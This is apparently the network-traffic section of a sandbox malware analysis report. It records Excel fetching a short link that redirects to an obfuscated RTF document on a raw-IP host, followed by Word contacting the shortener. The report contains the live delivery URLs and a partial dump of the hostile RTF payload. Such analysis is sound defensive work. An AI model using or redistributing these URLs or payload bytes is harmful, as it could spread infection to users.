                Jul 26, 2024 11:07:22.104171038 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.104176044 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.104190111 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.104190111 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.104204893 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.104212046 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.104219913 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.104231119 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.104250908 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.104330063 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.104989052 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.105005980 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.105021000 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.105036020 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.105050087 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.105051041 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.105066061 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.105070114 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.105081081 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.105084896 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.105096102 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.105104923 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.105110884 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.105123997 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.105125904 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.105140924 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.105142117 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.105156898 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.105160952 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.105181932 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.105194092 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.105263948 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.105969906 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.105986118 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.106000900 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.106015921 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.106030941 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.106034994 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.106045961 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.106050968 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.106061935 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.106067896 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.106077909 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.106087923 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.106093884 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.106101036 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.106110096 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.106118917 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.106125116 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.106137991 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.106139898 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.106153965 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.106177092 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.106250048 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.106939077 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.106955051 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.106969118 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.106985092 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.106997967 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.107004881 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.107012033 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.107027054 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.107031107 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.107043982 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.107049942 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.107059002 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.107069016 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.107075930 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.107089996 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.107091904 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.107105017 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.107109070 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.107120037 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.107132912 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.107146978 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.107214928 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.107902050 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.107918024 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.107930899 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.107944965 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.107947111 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.107959986 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.107961893 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.107978106 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.107991934 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.107997894 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.108007908 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.108016014 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.108022928 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.108035088 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.108037949 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.108052969 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.108055115 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.108067989 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.108076096 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.108082056 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.108093023 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.108110905 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.108181000 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.108863115 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.108879089 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.108894110 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.108905077 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.108908892 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.108922958 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.108923912 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.108938932 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.108943939 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.108953953 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.108962059 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.108969927 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.108978033 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.108984947 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.108993053 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.109000921 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.109013081 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.109015942 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.109030008 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.109030962 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.109050989 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.109070063 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.109136105 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.109662056 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.109678984 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.109694004 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.109709024 CEST8049166104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:22.109735012 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:22.109751940 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:23.445638895 CEST4916680192.168.2.22104.219.239.104
                Jul 26, 2024 11:08:21.243473053 CEST4916580192.168.2.22188.114.96.3
                Jul 26, 2024 11:08:21.385257006 CEST4916780192.168.2.22188.114.97.3
                Jul 26, 2024 11:08:21.390573978 CEST8049167188.114.97.3192.168.2.22
                Jul 26, 2024 11:08:21.390809059 CEST4916780192.168.2.22188.114.97.3
                Jul 26, 2024 11:08:21.390809059 CEST4916780192.168.2.22188.114.97.3
                Jul 26, 2024 11:08:21.395807981 CEST8049167188.114.97.3192.168.2.22
                Jul 26, 2024 11:08:21.973901987 CEST8049167188.114.97.3192.168.2.22
                Jul 26, 2024 11:08:22.170144081 CEST4916780192.168.2.22188.114.97.3
                Jul 26, 2024 11:08:22.385812998 CEST8049167188.114.97.3192.168.2.22
                Jul 26, 2024 11:08:22.385881901 CEST4916780192.168.2.22188.114.97.3
                Jul 26, 2024 11:08:57.039763927 CEST4916380192.168.2.22188.114.97.3
                Jul 26, 2024 11:08:57.039839029 CEST4916480192.168.2.22188.114.97.3

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jul 26, 2024 11:07:10.893076897 CEST5456253192.168.2.228.8.8.8
                Jul 26, 2024 11:07:10.905052900 CEST53545628.8.8.8192.168.2.22
                Jul 26, 2024 11:07:13.130799055 CEST5291753192.168.2.228.8.8.8
                Jul 26, 2024 11:07:13.142162085 CEST53529178.8.8.8192.168.2.22
                Jul 26, 2024 11:07:15.394576073 CEST6275153192.168.2.228.8.8.8
                Jul 26, 2024 11:07:15.402152061 CEST53627518.8.8.8192.168.2.22
                Jul 26, 2024 11:07:15.405034065 CEST5789353192.168.2.228.8.8.8
                Jul 26, 2024 11:07:15.412065983 CEST53578938.8.8.8192.168.2.22
                Jul 26, 2024 11:07:19.223375082 CEST5482153192.168.2.228.8.8.8
                Jul 26, 2024 11:07:19.234574080 CEST53548218.8.8.8192.168.2.22
                Jul 26, 2024 11:07:19.236428022 CEST5471953192.168.2.228.8.8.8
                Jul 26, 2024 11:07:19.244503975 CEST53547198.8.8.8192.168.2.22
                Jul 26, 2024 11:08:21.246254921 CEST4988153192.168.2.228.8.8.8
                Jul 26, 2024 11:08:21.371025085 CEST53498818.8.8.8192.168.2.22
                Jul 26, 2024 11:08:21.373070955 CEST5499853192.168.2.228.8.8.8
                Jul 26, 2024 11:08:21.384824991 CEST53549988.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jul 26, 2024 11:07:10.893076897 CEST192.168.2.228.8.8.80x1f12Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                Jul 26, 2024 11:07:13.130799055 CEST192.168.2.228.8.8.80xb13fStandard query (0)tny.wtfA (IP address)IN (0x0001)false
                Jul 26, 2024 11:07:15.394576073 CEST192.168.2.228.8.8.80x9701Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                Jul 26, 2024 11:07:15.405034065 CEST192.168.2.228.8.8.80x5554Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                Jul 26, 2024 11:07:19.223375082 CEST192.168.2.228.8.8.80x2664Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                Jul 26, 2024 11:07:19.236428022 CEST192.168.2.228.8.8.80xb6ecStandard query (0)tny.wtfA (IP address)IN (0x0001)false
                Jul 26, 2024 11:08:21.246254921 CEST192.168.2.228.8.8.80xd97eStandard query (0)tny.wtfA (IP address)IN (0x0001)false
                Jul 26, 2024 11:08:21.373070955 CEST192.168.2.228.8.8.80x9c5bStandard query (0)tny.wtfA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jul 26, 2024 11:07:10.905052900 CEST8.8.8.8192.168.2.220x1f12No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                Jul 26, 2024 11:07:10.905052900 CEST8.8.8.8192.168.2.220x1f12No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                Jul 26, 2024 11:07:13.142162085 CEST8.8.8.8192.168.2.220xb13fNo error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                Jul 26, 2024 11:07:13.142162085 CEST8.8.8.8192.168.2.220xb13fNo error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                Jul 26, 2024 11:07:15.402152061 CEST8.8.8.8192.168.2.220x9701No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                Jul 26, 2024 11:07:15.402152061 CEST8.8.8.8192.168.2.220x9701No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                Jul 26, 2024 11:07:15.412065983 CEST8.8.8.8192.168.2.220x5554No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                Jul 26, 2024 11:07:15.412065983 CEST8.8.8.8192.168.2.220x5554No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                Jul 26, 2024 11:07:19.234574080 CEST8.8.8.8192.168.2.220x2664No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                Jul 26, 2024 11:07:19.234574080 CEST8.8.8.8192.168.2.220x2664No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                Jul 26, 2024 11:07:19.244503975 CEST8.8.8.8192.168.2.220xb6ecNo error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                Jul 26, 2024 11:07:19.244503975 CEST8.8.8.8192.168.2.220xb6ecNo error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                Jul 26, 2024 11:08:21.371025085 CEST8.8.8.8192.168.2.220xd97eNo error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                Jul 26, 2024 11:08:21.371025085 CEST8.8.8.8192.168.2.220xd97eNo error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                Jul 26, 2024 11:08:21.384824991 CEST8.8.8.8192.168.2.220x9c5bNo error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                Jul 26, 2024 11:08:21.384824991 CEST8.8.8.8192.168.2.220x9c5bNo error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • tny.wtf
                • 104.219.239.104

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.2249161188.114.96.3802504C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampBytes transferredDirectionData
                Jul 26, 2024 11:07:10.917006969 CEST317OUTGET /dGa HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: tny.wtf
                Connection: Keep-Alive
                Jul 26, 2024 11:07:12.072160959 CEST719INHTTP/1.1 302 Found
                Date: Fri, 26 Jul 2024 09:07:12 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                Location: http://104.219.239.104/xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f2%2BGnnx71pmo7aXtVI5WtDO4ut2YFRvM7TIbn8Jzen5ZFqqdbCDamdUCgPAkf5oBStHti17EkLv8%2BQ2WVfy%2B2SD%2BpD0ZmGmMMNshqYKoFZtqhetrXBSqwjWf"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a933cec0835192a-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.2249162104.219.239.104802504C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampBytes transferredDirectionData
                Jul 26, 2024 11:07:12.085287094 CEST448OUTGET /xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 104.219.239.104
                Connection: Keep-Alive
                Jul 26, 2024 11:07:12.645530939 CEST1236INHTTP/1.1 200 OK
                Date: Fri, 26 Jul 2024 09:07:12 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                Last-Modified: Fri, 26 Jul 2024 01:46:43 GMT
                ETag: "14857-61e1caef74ae3"
                Accept-Ranges: bytes
                Content-Length: 84055
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/msword
                Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 09 09 09 09 09 09 09 09 09 7b 5c 2a 5c 67 72 6f 75 70 54 6f 70 39 32 30 34 34 33 31 37 32 20 5c 28 7d 0d 7b 5c 36 36 34 31 31 36 38 35 34 2f 3c 60 3f 32 3a b0 7e 35 37 24 2d 7c 2d 2b 5d 2c 7c 32 2f 3f 35 24 2c 3b 5e 3f 2b 21 2e 38 2f b0 7e 5d 25 a7 2e a7 36 5e 33 2f 3b 38 a7 34 23 5b a7 2e 3f 3e 29 3a 35 40 32 3d 3f 30 3f 3f 39 37 28 2b b5 36 b5 23 2b 60 27 35 3a 29 3b 2a 28 35 3f 3f 40 37 b0 3b 36 3f 26 34 25 3a 32 35 5b 37 35 36 3f 31 3f 5e 5d b0 26 5b 26 26 26 2b 2a 3e 37 2d 25 31 3f 38 3f 25 36 24 2a 21 3b 7c 23 3f 5f 32 30 3d 2f 21 7e 2b 27 25 3f 3a 3f 25 5b 34 27 5d 3f 2f 2c 7c 3f 60 38 28 3f 5f 23 2f 29 31 7c 3e 39 25 2d 60 60 60 36 a7 36 34 3b 30 37 33 2a 25 25 2c 24 3f 33 25 3c 2f 27 27 40 2f 5f 39 27 a7 3f b0 34 60 5f 2c 23 31 24 60 3e 35 23 2a 3f 36 3c 7e 3c 27 3f 3d 3b 26 25 30 26 23 3f 2f b5 3f 2a 24 3f b5 26 2e 2e 37 5d 23 3f a7 3f 7e 3f 25 2c 3f 23 38 2f 27 26 29 3a 3f b5 34 24 3f 37 37 2a 34 2a 5e 37 30 3f 36 3f 2d a7 a7 29 5e 5f 60 3f 39 3d 3a 25 60 a7 [TRUNCATED]
                Data Ascii: {\rtf1{\*\groupTop920443172 \(}{\664116854/<`?2:~57$-|-+],|2/?5$,;^?+!.8/~]%.6^3/;84#[.?>):5@2=?0??97(+6#+`'5:);*(5??@7;6?&4%:25[756?1?^]&[&&&+*>7-%1?8?%6$*!;|#?_20=/!~+'%?:?%[4']?/,|?`8(?_#/)1|>9%-```664;073*%%,$?3%</''@/_9'?4`_,#1$`>5#*?6<~<'?=;&%0&#?/?*$?&..7]#??~?%,?#8/'&):?4$?77*4*^70?6?-)^_`?9=:%`.|$+?]'0~]_1,;!7~??29`;:?<?_[^?5*@_0_6*,?>;-?>10@|@*=*?!>,]`2,':**[3#7]?8>2$~@1?,-%?7'<&@+)|-'*!4!2&?72&=5]#/?`_|&,-)$@9_2$,&+)7`2>/%<?#+&_`:3^/'1=2%-'7`%5%.99?6+%`+0?>1$%8_%?%0[)()!<%*?%&~-#9??:&!-5~2#10]|?7('?~^[6.-'`$)=`%?97(9<5;-6?@~?0[.00`%3+#4`8.48,>-?_@%>7[!~7?)86,)@*&/?7`!-$%;21>2&<-%[5-/|&+:7@2!4+~`[?=@'=+(?,1/&!|>1.&,5'&|4:*3|7.~+,,=*~@[36%/!&(#&`..?8-1?*(_)_,8#]'=.!?_%?%?,94***?4[-5$$?6==,=''1~%*~.,25~;=7`[<*]87/?.;89[>).|;?8^??5:^:0^*]07?9??*/+?<@6727:?_!>+?`-8%?'':)8`>--#7(/3)]??%@6%68<~)16!|:%|^?>4=4:[;_?@'^>`#1$?%/3^
                Jul 26, 2024 11:07:12.645581007 CEST1236INData Raw: 3b b5 3d 60 5e b5 24 3e 3c 3f 5e 2e 2e 5d 3a 2b b0 2f 37 2f 37 b5 3c 32 36 24 35 3d 3f 3f 2a 7e 31 39 2d 7c 36 7c 24 3f 35 2f 21 28 35 38 2c 60 3f 2e 36 3a 29 31 5f 35 29 5b 7c 3f 2f 27 2d 30 3a 3a 38 3f b0 39 27 35 32 28 3a 25 7e 32 32 2b 34 29
                Data Ascii: ;=`^$><?^..]:+/7/7<26$5=??*~19-|6|$?5/!(58,`?.6:)1_5)[|?/'-0::8?9'52(:%~22+4))&3*(__?`]-?7?[_4!)`.([>_?%?.%|1*0;*0^&8;#_~;7%`>~-48?*:|0]%?`._<[5942/=&3,-%&'|;?&?8*:/<,(1_?=]6$_=|?-=3#1[<$!06`.++!>%?~13#<!(<3_8$7?@!)(;0[@|][|6[
                Jul 26, 2024 11:07:12.645618916 CEST1236INData Raw: 25 3f 3b 5f 3f 27 33 7c 60 3f 7c 3f 39 40 38 40 2d 2c 5f b5 5d 5f 3f 60 2e a7 40 b5 37 31 30 3f 3f 27 3d 30 24 b5 23 5b b0 3b 2d 35 36 2f 34 21 60 25 23 3e 2a 5f 27 3b 25 3f 3c b5 2b 2f b0 b0 33 37 2d 2e 60 37 2d 24 a7 5b 28 40 2b 3f 35 2d 3f 33
                Data Ascii: %?;_?'3|`?|?9@8@-,_]_?`.@710??'=0$#[;-56/4!`%#>*_';%?<+/37-.`7-$[(@+?5-?3)(_~+%,?%<[>@;%4-05:?:<3_9%2#-[32?;4::&;@,1_%.6?2*6,?1:$@;4-''5.-*!&&[=-57/~43(?-/783.?7]5+^|#?;8??`1?/`5(*)~738;94?@+_;1)(?~,?9%%%-#%[,<02_$40?0%)-19
                Jul 26, 2024 11:07:12.645653963 CEST1236INData Raw: 2b 5e 7e 25 26 27 33 36 38 b5 3f 3f 5f 29 37 b5 7c 2e 29 2a 23 2c 38 2f 5f 28 5d 2f 5d 3e 2b 2b 27 34 23 3a 26 30 2d 5f 28 27 25 37 5d 2b 34 2c 5f 24 29 36 3f 3f 3f 5e 3f 2c 27 27 32 30 40 60 23 26 37 b0 2a 5f 21 26 b0 34 a7 36 25 34 39 2b 33 7e
                Data Ascii: +^~%&'368??_)7|.)*#,8/_(]/]>++'4#:&0-_('%7]+4,_$)6???^?,''20@`#&7*_!&46%49+3~:?)?|`?_4:]%9=%&>)~7(4(26*72??0#3#'>'?[%`)]1~%#%,-<|:-!(?_!129$`+<?0!_&7?)90?=<))+&<96[>(5:?[*/)/5?5?`:??;':%<=];?([;|()'[|&*=2-?%6_%(^_&30<!?|?'#31%?
                Jul 26, 2024 11:07:12.645941973 CEST1236INData Raw: 20 20 20 09 20 09 20 20 20 20 20 20 09 20 20 09 20 20 20 09 30 30 30 30 0a 0a 0d 0d 0a 0d 0d 0d 0d 0a 0d 0d 0d 0d 0d 0a 0d 0d 0a 0a 0d 30 09 20 20 20 20 20 09 09 20 20 09 09 20 20 09 09 09 09 20 20 20 20 09 09 20 20 20 09 20 20 20 20 20 09 09 20
                Data Ascii: 00000 00 b0
                Jul 26, 2024 11:07:12.645976067 CEST1236INData Raw: 0a 0d 0a 0a 0a 0d 0d 0a 0a 0a 0a 0d 0a 0d 0a 0a 0a 0a 0d 0d 31 30 09 09 20 20 20 20 09 09 20 09 20 09 09 09 09 20 09 09 09 20 20 09 20 20 20 20 09 20 20 20 20 20 20 20 09 09 09 09 20 09 20 09 20 09 09 09 09 09 09 20 20 20 09 20 09 20 09 20 20 20
                Data Ascii: 10 88c b7
                Jul 26, 2024 11:07:12.646009922 CEST1236INData Raw: 20 09 09 09 20 20 20 09 09 09 09 20 09 20 09 20 09 20 20 09 09 20 20 09 38 09 09 20 20 09 20 20 09 09 09 09 20 09 09 20 20 20 20 20 09 09 20 09 09 20 20 09 20 09 20 20 09 20 09 09 09 09 20 20 20 09 20 09 09 20 09 09 09 20 20 20 09 09 09 09 20 09
                Data Ascii: 8 5 5ff
                Jul 26, 2024 11:07:12.646047115 CEST1236INData Raw: 09 20 09 09 20 09 20 09 09 20 09 20 09 20 09 09 20 20 09 20 20 09 09 09 09 20 09 09 20 20 20 09 09 09 20 20 09 09 09 20 20 20 20 20 09 09 09 09 09 09 09 20 20 09 09 39 0a 0a 0d 0d 0d 0a 0a 0a 0d 0a 0a 0a 0d 0d 0d 0a 0a 0d 0a 0a 0d 62 09 20 20 20
                Data Ascii: 9b 2 6
                Jul 26, 2024 11:07:12.646476984 CEST1236INData Raw: 0d 37 0a 0d 0a 0d 0d 0d 0d 0d 0d 0d 0a 0a 0a 0d 0d 0a 0d 0a 0a 0d 0d 61 63 38 09 09 09 09 20 09 20 09 20 09 20 20 09 20 09 09 20 20 20 09 20 09 20 20 09 09 20 09 09 20 09 09 09 09 20 20 20 20 09 20 20 09 09 09 20 20 20 09 09 20 09 09 20 09 09 09
                Data Ascii: 7ac8 e f 80
                Jul 26, 2024 11:07:12.646514893 CEST1236INData Raw: 20 20 09 09 20 20 09 20 20 20 20 09 09 20 09 20 09 20 20 20 20 20 09 20 09 09 09 20 20 20 20 20 09 20 20 09 09 09 20 09 09 20 09 09 20 20 20 20 09 09 09 64 62 0d 0d 0d 0a 0d 0a 0d 0a 0a 0a 0d 0a 0a 0d 0a 0d 0a 0a 0d 0d 0d 39 38 37 20 09 20 09 09
                Data Ascii: db987 fd281 b2
                Jul 26, 2024 11:07:12.650794029 CEST1236INData Raw: 09 20 20 20 20 20 20 09 20 20 09 09 20 09 09 20 20 09 20 20 20 20 09 09 20 20 09 20 09 09 09 20 20 09 09 09 20 09 09 20 20 20 09 09 09 20 20 09 20 20 09 09 09 66 0a 0a 0d 0a 0a 0d 0d 0a 0a 0a 0d 0d 0a 0a 0a 0d 0a 0d 0d 0d 0d 66 20 20 09 20 09 09
                Data Ascii: ff b 0e3


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.2249163188.114.97.380652C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampBytes transferredDirectionData
                Jul 26, 2024 11:07:13.151324034 CEST129OUTOPTIONS / HTTP/1.1
                User-Agent: Microsoft Office Protocol Discovery
                Host: tny.wtf
                Content-Length: 0
                Connection: Keep-Alive
                Jul 26, 2024 11:07:13.739043951 CEST572INHTTP/1.1 404 Not Found
                Date: Fri, 26 Jul 2024 09:07:13 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
